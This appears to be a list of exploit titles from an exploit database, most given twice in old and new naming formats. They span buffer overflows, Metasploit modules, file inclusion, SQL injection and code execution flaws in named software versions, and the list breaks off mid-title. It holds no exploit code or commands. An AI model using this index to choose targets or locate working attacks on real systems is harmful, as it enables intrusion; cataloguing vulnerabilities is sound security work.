(Metasploit) Zenturi ProgramChecker ActiveX - Control Arbitrary File Download (Metasploit) Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit) CA BrightStor ARCserve Backup - AddColumn() ActiveX Buffer Overflow (Metasploit) Microsoft Internet Explorer - createTextRange() Code Execution (MS06-013) (Metasploit) CA BrightStor ARCserve Backup - 'AddColumn()' ActiveX Buffer Overflow (Metasploit) Microsoft Internet Explorer - 'createTextRange()' Code Execution (MS06-013) (Metasploit) AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow (Metasploit) AOL Radio AmpX - ActiveX Control 'ConvertFile()' Buffer Overflow (Metasploit) NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow (Metasploit) NCTAudioFile2 2.x - ActiveX Control 'SetFormatLikeSample()' Buffer Overflow (Metasploit) SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow (Metasploit) SasCam Webcam Server 2.6.5 - 'Get()' Method Buffer Overflow (Metasploit) Microsoft DNS RPC Service - extractQuotedChar() TCP Overflow (MS07-029) (Metasploit) Microsoft DNS RPC Service - 'extractQuotedChar()' TCP Overflow (MS07-029) (Metasploit) httpdx - h_handlepeer() Function Buffer Overflow (Metasploit) httpdx - 'h_handlepeer()' Function Buffer Overflow (Metasploit) CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit) CA CAM (Windows x86) - 'log_security()' Stack Buffer Overflow (Metasploit) Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow (Metasploit) Trend Micro ServerProtect 5.58 - 'CreateBinding()' Buffer Overflow (Metasploit) XtreamerPRO Media-player 2.6.0 / 2.7.0 - Multiple Vulnerabilities XtreamerPRO Media-player 2.6.0/2.7.0 - Multiple Vulnerabilities Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit) Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' Exploit (Metasploit) CTEK SkyRouter 4200 / 4300 - Command Execution (Metasploit) CTEK SkyRouter 4200/4300 - Command Execution (Metasploit) Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Exploit LotusCMS 3.0 - eval() Remote Command Execution (Metasploit) LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) Apache Tomcat - Remote Exploit (PUT Request) and Account Scanner Apache Tomcat - Account Scanner / 'PUT' Request Remote Exploit Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Remote Code Execution) Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Exploit Mozilla Firefox 8/9 - AttributeChildRemoved() Use-After-Free (Metasploit) Mozilla Firefox 8/9 - 'AttributeChildRemoved()' Use-After-Free (Metasploit) RabidHamster R4 - Log Entry sprintf() Buffer Overflow (Metasploit) RabidHamster R4 - Log Entry 'sprintf()' Buffer Overflow (Metasploit) Samsung NET-i viewer - Multiple ActiveX BackupToAvi() Remote Overflow (Metasploit) Samsung NET-i viewer - Multiple ActiveX 'BackupToAvi()' Remote Overflow (Metasploit) Microsoft IIS 6.0 / 7.5 (+ PHP) - Multiple Vulnerabilities Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities Linux Kernel 2.0.30 / 2.0.35 / 2.0.36 / 2.0.37 - Blind TCP Spoofing Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing ETL Delegate 5.9.x / 6.0.x - Buffer Overflow ETL Delegate 5.9.x/6.0.x - Buffer Overflow Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (1) Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (3) Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (1) Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (3) Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Remote Command Execution) Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution PHP IRC Bot pbot - eval() Remote Code Execution (Metasploit) PHP IRC Bot pbot - 'eval()' Remote Code Execution (Metasploit) Icecast 1.3.7/1.3.8 - print_client() Format String Icecast 1.3.7/1.3.8 - 'print_client()' Format String FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow FreeBSD 4.2-stable ftpd - glob() Buffer Overflow Vulnerabilities OpenBSD 2.x < 2.8 ftpd - glob() Buffer Overflow FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - 'glob()' Buffer Overflow FreeBSD 4.2-stable FTPd - 'glob()' Buffer Overflow Vulnerabilities OpenBSD 2.x < 2.8 FTPd - 'glob()' Buffer Overflow Apache Tomcat 3.2.3/3.2.4 - Source.jsp Malformed Request Information Disclosure Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure Apache Tomcat 3.2.3/3.2.4 - RealPath.jsp Malformed Request Information Disclosure Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure Working Resources BadBlue 1.7.3 - cleanSearchString() Cross-Site Scripting Working Resources BadBlue 1.7.3 - 'cleanSearchString()' Cross-Site Scripting NTR - ActiveX Control StopModule() Remote Code Execution (Metasploit) NTR - ActiveX Control 'StopModule()' Remote Code Execution (Metasploit) NTR - ActiveX Control Check() Method Buffer Overflow (Metasploit) HP Application Lifecycle Management - XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution (Metasploit) NTR - ActiveX Control 'Check()' Method Buffer Overflow (Metasploit) HP Application Lifecycle Management - 'XGO.ocx' ActiveX 'SetShapeNodeType()' Remote Code Execution (Metasploit) ghttpd 1.4.x - Log() Function Buffer Overflow ghttpd 1.4.x - 'Log()' Function Buffer Overflow zkfingerd 0.9.1 - say() Format String zkfingerd 0.9.1 - 'say()' Format String Linux Kernel 2.0.x / 2.2.x / 2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 gethostbyname() - Buffer Overflow AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Buffer Overflow Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (2) Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (2) BitchX 1.0 - Remote Send_CTCP() Memory Corruption BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption PoPToP PPTP 1.0/1.1.x - Negative read() Argument Remote Buffer Overflow PoPToP PPTP 1.0/1.1.x - Negative 'read()' Argument Remote Buffer Overflow Invision Power Board (IP.Board) 3.3.4 - Unserialize() PHP Code Execution (Metasploit) Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit) NetIQ Privileged User Manager 2.3.1 - ldapagnt_eval() Remote Perl Code Execution (Metasploit) NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Remote Perl Code Execution (Metasploit) Valve Software Half-Life Server 1.1.1.0 / 3.1.1.1c1 / 4.1.1.1a - Multiplayer Request Buffer Overflow Valve Software Half-Life Server 1.1.1.0/3.1.1.1c1/4.1.1.1a - Multiplayer Request Buffer Overflow WU-FTPD 2.6.2 / 2.6.0 / 2.6.1 - 'realpath()' Off-by-One Buffer Overflow FreeBSD 4.8 - realpath() Off-by-One Buffer Overflow WU-FTPD 2.6.0/2.6.1/2.6.2 - 'realpath()' Off-by-One Buffer Overflow FreeBSD 4.8 - 'realpath()' Off-by-One Buffer Overflow InduSoft Web Studio - ISSymbol.ocx InternationalSeparator() Heap Overflow (Metasploit) InduSoft Web Studio - 'ISSymbol.ocx' 'InternationalSeparator()' Heap Overflow (Metasploit) GNU Anubis 3.6.x/3.9.x - auth.c auth_ident() Function Overflow GNU Anubis 3.6.x/3.9.x - 'auth.c' 'auth_ident()' Function Overflow Rlpr 2.0 - msg() Function Multiple Vulnerabilities Rlpr 2.0 - 'msg()' Function Multiple Vulnerabilities PHP 4.x/5.0 - Strip_Tags() Function Bypass PHP 4.x/5.0 - 'Strip_Tags()' Function Bypass Movable Type 4.2x / 4.3x - Web Upgrade Remote Code Execution (Metasploit) Movable Type 4.2x/4.3x - Web Upgrade Remote Code Execution (Metasploit) NullSoft Winamp 2-5 - '.wsz' Remote Code Execution NullSoft Winamp 2.4 < 5.0.4 - '.wsz' Remote Code Execution Portable UPnP SDK - unique_service_name() Remote Code Execution (Metasploit) Portable UPnP SDK - 'unique_service_name()' Remote Code Execution (Metasploit) Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit) Novell ZENworks Configuration Management 10 SP3/11 SP2 - Remote Execution (Metasploit) PHP 4/5 - addslashes() Null Byte Bypass PHP 4/5 - 'addslashes()' Null Byte Bypass Smail 3 - Multiple Remote and Local Vulnerabilities Smail 3 - Multiple Remote/Local Vulnerabilities SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx Remote Code Execution SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit) Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit) Java Applet - Driver Manager Privileged toString() Remote Code Execution (Metasploit) Java Applet - Driver Manager Privileged 'toString()' Remote Code Execution (Metasploit) Oracle Java - storeImageArray() Invalid Array Indexing Oracle Java - 'storeImageArray()' Invalid Array Indexing PHP 4.x - tempnam() Function open_basedir Restriction Bypass PHP 4.x - 'tempnam()' Function open_basedir Restriction Bypass Oracle Java - IntegerInterleavedRaster.verify() Signed Integer Overflow Oracle Java - 'IntegerInterleavedRaster.verify()' Signed Integer Overflow Java - storeImageArray() Invalid Array Indexing (Metasploit) Java - 'storeImageArray()' Invalid Array Indexing (Metasploit) Oracle Java - BytePackedRaster.verify() Signed Integer Overflow Oracle Java - 'BytePackedRaster.verify()' Signed Integer Overflow Oracle Java - ShortComponentRaster.verify() Memory Corruption Oracle Java - 'ShortComponentRaster.verify()' Memory Corruption Apache 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security Apache 1.3.35/2.0.58/2.2.2 - Arbitrary HTTP Request Headers Security Python 2.5 - PyLocale_strxfrm Function Remote Information Leak Python 2.5 - 'PyLocale_strxfrm' Function Remote Information Leak PHP 4.4.4 - Zip_Entry_Read() Integer Overflow PHP 5.1.6 - Chunk_Split() Function Integer Overflow PHP 4.4.4 - 'Zip_Entry_Read()' Integer Overflow PHP 5.1.6 - 'Chunk_Split()' Function Integer Overflow PHP 5.1.6 - Imap_Mail_Compose() Function Buffer Overflow PHP 5.1.6 - Msg_Receive() Memory Allocation Integer Overflow PHP 5.1.6 - 'Imap_Mail_Compose()' Function Buffer Overflow PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit) Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit) Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow Ghostscript 8.0.1/8.15 - 'zseticcspace()' Function Buffer Overflow VideoCharge Studio 2.12.3.685 - GetHttpResponse() MITM Remote Code Execution VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution Python socket.recvfrom_into() - Remote Buffer Overflow Python - 'socket.recvfrom_into()' Remote Buffer Overflow Vim 'mch_expand_wildcards()' - Heap Based Buffer Overflow Vim - 'mch_expand_wildcards()' Heap Based Buffer Overflow Boat Browser 8.0 / 8.0.1 - Remote Code Execution Boat Browser 8.0/8.0.1 - Remote Code Execution Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit) Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit) Pro Softnet IDrive Online Backup 3.4.0 - ActiveX SaveToFile() Arbitrary File Overwrite Pro Softnet IDrive Online Backup 3.4.0 - ActiveX 'SaveToFile()' Arbitrary File Overwrite RealVNC 4.1.0 / 4.1.1 - Authentication Bypass RealVNC 4.1.0/4.1.1 - Authentication Bypass PHP 5.5.33 / 7.0.4 - SNMP Format String PHP 5.5.33/7.0.4 - SNMP Format String Cisco ASA Software 8.x / 9.x - IKEv1 and IKEv2 Buffer Overflow Cisco ASA Software 8.x/9.x - IKEv1 / IKEv2 Buffer Overflow OpenSSHd 7.2p2 - Username Enumeration OpenSSH 7.2p2 - Username Enumeration Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039) Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039) FreePBX 13 / 14 - Remote Command Execution / Privilege Escalation FreePBX 13/14 - Remote Command Execution / Privilege Escalation Subversion 1.6.6 / 1.6.12 - Code Execution Subversion 1.6.6/1.6.12 - Code Execution Ansible 2.1.4 / 2.2.1 - Command Execution Ansible 2.1.4/2.2.1 - Command Execution Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit) Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit) GIT 1.8.5.6 / 1.9.5 / 2.0.5 / 2.1.4/ 2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit) Ruby on Rails 4.0.x / 4.1.x / 4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit) GIT 1.8.5.6/1.9.5/2.0.5/2.1.4/2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit) Ruby on Rails 4.0.x/4.1.x/4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit) Easy File Sharing Web Server 7.2 - GET HTTP Request (PassWD) Buffer Overflow (SEH) Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit) Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit) UBB.Threads 6.2.x < 6.3x - One Char Brute Force Exploit vBulletin - LAST.php SQL Injection UBBCentral UBB.Threads 6.2.x < 6.3x - One Char Brute Force Exploit vBulletin - 'LAST.php' SQL Injection phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit PHP 4.3.9 + phpBB 2.x - Unserialize() Remote Exploit (Compiled) phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Exploit PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit (Compiled) e107 - include() Remote Exploit e107 - 'include()' Remote Exploit CuteNews 1.4.0 - Shell Inject Remote Command Execution CuteNews 1.4.0 - Shell Injection / Remote Command Execution CuteNews 1.4.1 - Shell Inject Remote Command Execution CuteNews 1.4.1 - Shell Injection / Remote Command Execution WebWiz Products 1.0 / 3.06 - Login Bypass (SQL Injection) WebWiz Products 1.0/3.06 - Login Bypass (SQL Injection) NOCC Webmail 1.0 - (Local Inclusion) Remote Code Execution NOCC Webmail 1.0 - Local File Inclusion / Remote Code Execution 4Images 1.7.1 - (Local Inclusion) Remote Code Execution 4Images 1.7.1 - Local File Inclusion / Remote Code Execution Fast Click 1.1.3 / 2.3.8 - 'show.php' Remote File Inclusion Fast Click 1.1.3/2.3.8 - 'show.php' Remote File Inclusion UBB Threads 6.4.x < 6.5.2 - (thispath) Remote File Inclusion UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion UBB Threads 5.x / 6.x - Multiple Remote File Inclusion UBBCentral UBB.Threads 5.x/6.x - Multiple Remote File Inclusion XMB 1.9.6 Final - basename() Remote Command Execution PHPay 2.02 - 'nu_mail.inc.php' Remote mail() Injection XMB 1.9.6 Final - 'basename()' Remote Command Execution PHPay 2.02 - 'nu_mail.inc.php' 'mail()' Remote Injection Phaos 0.9.2 - basename() Remote Command Execution Phaos 0.9.2 - 'basename()' Remote Command Execution Newsscript 0.5 - Remote File Inclusion / Local File Inclusion Newsscript 0.5 - Local/Remote File Inclusion exV2 < 2.0.4.3 - extract() Remote Command Execution exV2 < 2.0.4.3 - 'extract()' Remote Command Execution KGB 1.87 - (Local Inclusion) Remote Code Execution KGB 1.87 - Local File Inclusion / Remote Code Execution UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution UBBCentral UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution Invision Gallery 2.0.7 - readfile() & SQL Injection Invision Gallery 2.0.7 - 'readfile()' / SQL Injection Flatnuke 2.5.8 - file() Privilege Escalation / Code Execution Flatnuke 2.5.8 - 'file()' Privilege Escalation / Code Execution Invision Gallery 2.0.7 (Linux) - readfile() / SQL Injection Invision Gallery 2.0.7 (Linux) - 'readfile()' / SQL Injection Imageview 5 - 'Cookie/index.php' Remote / Local File Inclusion Imageview 5 - 'Cookie/index.php' Local/Remote File Inclusion Woltlab Burning Board Lite 1.0.2 - decode_cookie() SQL Injection Woltlab Burning Board Lite 1.0.2 - 'decode_cookie()' SQL Injection PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Inject Exploit PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Injection Cacti 0.8.6i - cmd.php popen() Remote Injection Cacti 0.8.6i - 'cmd.php' 'popen()' Remote Injection P-News 1.16 / 1.17 - 'user.dat' Remote Password Disclosure P-News 1.16/1.17 - 'user.dat' Remote Password Disclosure Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (1) Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (2) Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1) Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2) Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (3) Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3) Jupiter CMS 1.1.5 - 'index.php' Remote / Local File Inclusion Jupiter CMS 1.1.5 - 'index.php' Local/Remote File Inclusion PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 exec() eExploit PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 'exec()' Exploit MySpeach 3.0.7 - Remote / Local File Inclusion MySpeach 3.0.7 - Local/Remote File Inclusion YAAP 1.5 - __autoload() Remote File Inclusion YAAP 1.5 - '__autoload()' Remote File Inclusion Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution Quick.Cart 2.2 - Local/Remote File Inclusion / Remote Code Execution Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution Entertainment CMS - (Local Inclusion) Remote Command Execution Entertainment CMS - Local File Inclusion / Remote Command Execution iziContents rc6 - Remote File Inclusion / Local File Inclusion iziContents rc6 - Local/Remote File Inclusion PHP Project Management 0.8.10 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion Rayzz Script 2.0 - Local/Remote File Inclusion SerWeb 2.0.0 dev1 2007-02-20 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities SquirrelMail G/PGP Encryption Plugin - deletekey() Command Injection SquirrelMail G/PGP Encryption Plugin - 'deletekey()' Command Injection Agares phpAutoVideo 2.21 - Remote / Local File Inclusion Agares phpAutoVideo 2.21 - Local/Remote File Inclusion TeamCalPro 3.1.000 - Multiple Remote / Local File Inclusion TeamCalPro 3.1.000 - Multiple Local/Remote File Inclusions NetRisk 1.9.7 - Remote / Local File Inclusion NetRisk 1.9.7 - Local/Remote File Inclusion AJchat 0.10 - unset() bug SQL Injection AJchat 0.10 - 'unset()' bug SQL Injection jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities jspwiki 2.4.104/2.5.139 - Multiple Vulnerabilities LookStrike Lan Manager 0.9 - Remote / Local File Inclusion LookStrike Lan Manager 0.9 - Local/Remote File Inclusion ExBB 0.22 - Local / Remote File Inclusion ExBB 0.22 - Local/Remote File Inclusion HomePH Design 2.10 RC2 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting HomePH Design 2.10 RC2 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting ourvideo CMS 9.5 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting ourvideo CMS 9.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure Pivot 1.40.5 - Dreamwind 'load_template()' Credentials Disclosure 1024 CMS 1.4.4 - Multiple Remote / Local File Inclusion 1024 CMS 1.4.4 - Multiple Local/Remote File Inclusion Yourownbux 3.1 / 3.2 Beta - SQL Injection Yourownbux 3.1/3.2 Beta - SQL Injection Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection Ol BookMarks Manager 0.7.5 - Local File Inclusion / Remote File Inclusion / SQL Injection wotw 5.0 - Local / Remote File Inclusion wotw 5.0 - Local/Remote File Inclusion PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion PHPmyGallery 1.0beta2 - Local/Remote File Inclusion PHPmyGallery 1.5beta - 'common-tpl-vars.php' Local / Remote File Inclusion PHPmyGallery 1.5beta - 'common-tpl-vars.php' Local/Remote File Inclusion ASPSiteWare Automotive Dealer 1.0 / 2.0 - SQL Injection ASPSiteWare RealtyListing 1.0 / 2.0 - SQL Injection ASPSiteWare Automotive Dealer 1.0/2.0 - SQL Injection ASPSiteWare RealtyListing 1.0/2.0 - SQL Injection phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting phpskelsite 1.4 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting PlaySms 0.9.3 - Multiple Remote / Local File Inclusion PlaySms 0.9.3 - Multiple Local/Remote File Inclusions Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass Simple Machines Forum (SMF) 1.0.13/1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass phpList 2.10.x - (Remote Code Execution by environ Inclusion) Local File Inclusion phpList 2.10.x - Remote Code Execution / Local File Inclusion GNUBoard 4.31.04 (09.01.30) - Multiple Local+Remote Vulnerabilities GNUBoard 4.31.04 (09.01.30) - Local/Remote Multiple Vulnerabilities OpenHelpDesk 1.0.100 - eval() Code Execution (Metasploit) OpenHelpDesk 1.0.100 - 'eval()' Code Execution (Metasploit) Wili-CMS 0.4.0 - Remote File Inclusion / Local File Inclusion / Authentication Bypass Wili-CMS 0.4.0 - Local File Inclusion / Remote File Inclusion / Authentication Bypass PHP Director 0.21 - (SQL into outfile) eval() Injection PHP Director 0.21 - (SQL Into Outfile) 'eval()' Injection UBB.Threads 5.5.1 - (message) SQL Injection UBBCentral UBB.Threads 5.5.1 - 'message' SQL Injection Geeklog 1.5.2 - SEC_authenticate() SQL Injection Geeklog 1.5.2 - 'SEC_authenticate()' SQL Injection WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion WebPortal CMS 0.8b - Multiple Local/Remote File Inclusions PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Inject Bitweaver 2.6 - saveFeed() Remote Code Execution PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Injection Bitweaver 2.6 - 'saveFeed()' Remote Code Execution School Data Navigator - (page) Local / Remote File Inclusion School Data Navigator - 'page' Local/Remote File Inclusion phpCollegeExchange 0.1.5c - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting phpCollegeExchange 0.1.5c - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting ClearContent - 'image.php url' Remote File Inclusion / Local File Inclusion ClearContent - 'image.php url' Local/Remote File Inclusion e107 Plugin my_gallery 2.4.1 - readfile() Local File Disclosure e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure skadate dating - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting skadate dating - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting Ultrize TimeSheet 1.2.2 - readfile() Local File Disclosure Ultrize TimeSheet 1.2.2 - 'readfile()' Local File Disclosure aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass / File Disclosure) Multiple Remote Vulnerabilities Facil Helpdesk - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities IsolSoft Support Center 2.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities Facil Helpdesk - (Local File Inclusion / Remote File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities IsolSoft Support Center 2.5 - (Local File Inclusion / Remote File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities ZeroBoard 4.1 pl7 - now_connect() Remote Code Execution ZeroBoard 4.1 pl7 - 'now_connect()' Remote Code Execution DedeCMS 5.1 - SQL Injection DeDeCMS 5.1 - SQL Injection TwonkyMedia Server 4.4.17 / 5.0.65 - Cross-Site Scripting TwonkyMedia Server 4.4.17/5.0.65 - Cross-Site Scripting Xerver 4.31 / 4.32 - HTTP Response Splitting Xerver 4.31/4.32 - HTTP Response Splitting sugar crm 5.5.0.rc2 / 5.2.0j - Multiple Vulnerabilities Sugar CRM 5.5.0.rc2/5.2.0j - Multiple Vulnerabilities Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion Quate CMS 0.3.5 - Local/Remote File Inclusion Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - Local File Inclusion / SQL Injection UBB.Threads 7.5.4 2 - Multiple File Inclusion Invision Power Board 2.3.6/3.0.4 - Local File Inclusion / SQL Injection UBBCentral UBB.Threads 7.5.4 2 - Multiple File Inclusion NAS Uploader 1.0 / 1.5 - Arbitrary File Upload NAS Uploader 1.0/1.5 - Arbitrary File Upload Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection Pandora FMS Monitoring Application 2.1.x /3.x - SQL Injection UBB Threads 6.0 - Remote File Inclusion UBBCentral UBB.Threads 6.0 - Remote File Inclusion fileNice PHP file browser - Remote File Inclusion / Local File Inclusion fileNice PHP file browser - Local/Remote File Inclusion Pay Per Minute Video Chat Script 2.0 / 2.1 - Multiple Vulnerabilities Pay Per Minute Video Chat Script 2.0/2.1 - Multiple Vulnerabilities ProfitCode Shopping Cart - Multiple Local File Inclusion / Remote File Inclusion Vulnerabilities ProfitCode Shopping Cart - Multiple Local/Remote File Inclusion Vulnerabilities Izumi 1.1.0 - (Remote File Inclusion / Local File Inclusion) Multiple Include Izumi 1.1.0 - (Local File Inclusion / Remote File Inclusion) Multiple Include TSOKA:CMS 1.1 / 1.9 / 2.0 - SQL Injection / Cross-Site Scripting TSOKA:CMS 1.1/1.9/2.0 - SQL Injection / Cross-Site Scripting Facil-CMS 0.1RC2 - Local / Remote File Inclusion Facil-CMS 0.1RC2 - Local/Remote File Inclusion jevoncms - Local File Inclusion / Remote File Inclusion jevoncms - Local/Remote File Inclusion Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Vieassociative Openmairie 1.01 Beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openurgence vaccin 1.03 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Police Municipale Open Main Courante 1.01beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openscrutin 1.03 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openreglement 1.04 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openregistrecil 1.02 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openplanning 1.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openfoncier 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Madirish Webmail 2.01 - 'baseDir' Remote File Inclusion / Local File Inclusion Openplanning 1.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openfoncier 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Opencourrier 2.03beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions AutoDealer 1.0 / 2.0 - MSSQL Injection AutoDealer 1.0/2.0 - MSSQL Injection Openannuaire Openmairie Annuaire 2.00 - (Remote File Inclusion / Local File Inclusion) 